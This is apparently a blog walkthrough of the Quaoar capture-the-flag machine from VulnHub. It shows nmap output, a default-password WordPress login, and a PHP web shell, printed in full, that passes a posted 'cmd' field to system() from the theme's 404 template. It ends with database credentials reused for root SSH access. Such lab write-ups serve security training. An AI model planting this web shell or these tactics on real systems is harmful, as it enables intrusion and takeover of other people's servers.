So this one is tagged very easy by Viper. Quaoar, a vulnerable machine created by Viper for Hackfest 2016 CTF http://hackfest.ca/. He even mentioned the tools we can use in the description as well as when you boot the machine. The machine is available at https://www.vulnhub.com/entry/hackfest2016-quaoar,180/
Right after you boot the machine, you will be notified of the challenge, which is to capture 3 flags by getting a shell, escalating to root and find a post exploitation flag. The IP address is also displayed.
Run nmap to find out the the services running on the machine. A number of services were open including httpd on port 80.
root@Garrison:~# nmap -Pn -p- -sV 192.168.9.130 Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-04-19 08:36 IST Nmap scan report for 192.168.9.130 Host is up (0.00014s latency). Not shown: 65526 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0) 53/tcp open domain ISC BIND 9.8.1-P1 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) 110/tcp open pop3 Dovecot pop3d 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 143/tcp open imap Dovecot imapd 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 993/tcp open ssl/imap Dovecot imapd 995/tcp open ssl/pop3 Dovecot pop3d MAC Address: 00:0C:29:88:81:79 (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 38.88 seconds
Starting with httpd, open a browser, write IP address of machine in address bar and hit enter.
The welcome page had nothing except an image hyperlinked to another image. Nothing in the source code. Lets check robots.txt for help.
Found /wordpress/ as allowed. This might be a wordpress setup/installation, so lets check it as well.
So, there is a wordpress site running. Why not try to login to admin dashboard with default username. After all this is a very easy machine. Move over to /wordpress/wp-login.php and try username:password pair as admin:admin.
That easy! Yes, we now have the wordpress admin dashboard.
We can now edit theme’s and plugin’s core source. Go to Appearance>Editor and select 404 Template to edit. Add the following code. This enables us to execute OS command on server.
<form method="post" name="oscmd">
<input type="text" name="cmd" <?php if (isset($_POST["submit"])){ echo 'value="'.$_POST["cmd"].'"'; } ?> />
<input type="submit" name="submit" value="Command" />
</form>
<br />
<?php
error_reporting(E_ALL);
ini_set('display_errors', 1);
if (isset($_POST["submit"])){
system($_POST["cmd"]);
}
?>
Now open a page that would return a 404 template, like /wordpress/?p=99, a blog that does not exist. Running ls command via the interface gives us a list of files on current web directory.
We can cat wp-config.php to see the contents of configuration. As this file contains html entities, do check the source of the result to fully read the contents.
The credentials for database user are there in the source. Sometimes, DBA or developer (if he is the only one working), uses system user’s credential for database user as well. What are the chances that this will work for system user, then.
Username: root
Password: rootpassword!
As ssh service is running on the target, try to connect using above credential.
It worked. We now have the shell with root privileges. Lets check what is there in the home directory. Ahh!, a flag.txt file. There we have our 1st flag.
Lets check what a local user have in its home. Another flag.txt. This is easy.
There is also a post exploitation flag as mentioned in boot screen of Quaoar. We generally check a number of things, post exploitation, and one of them is crontab. A little bit of surfing through cron files, we found the third flag in /etc/cron.d/php5
The very decription of Quaoar VM that it is is actually made it easy. Thank you Viper and Vulnhub for the machine.
Leave you comments, queries, suggestions on how can I improve below.
Jasper & Garrison 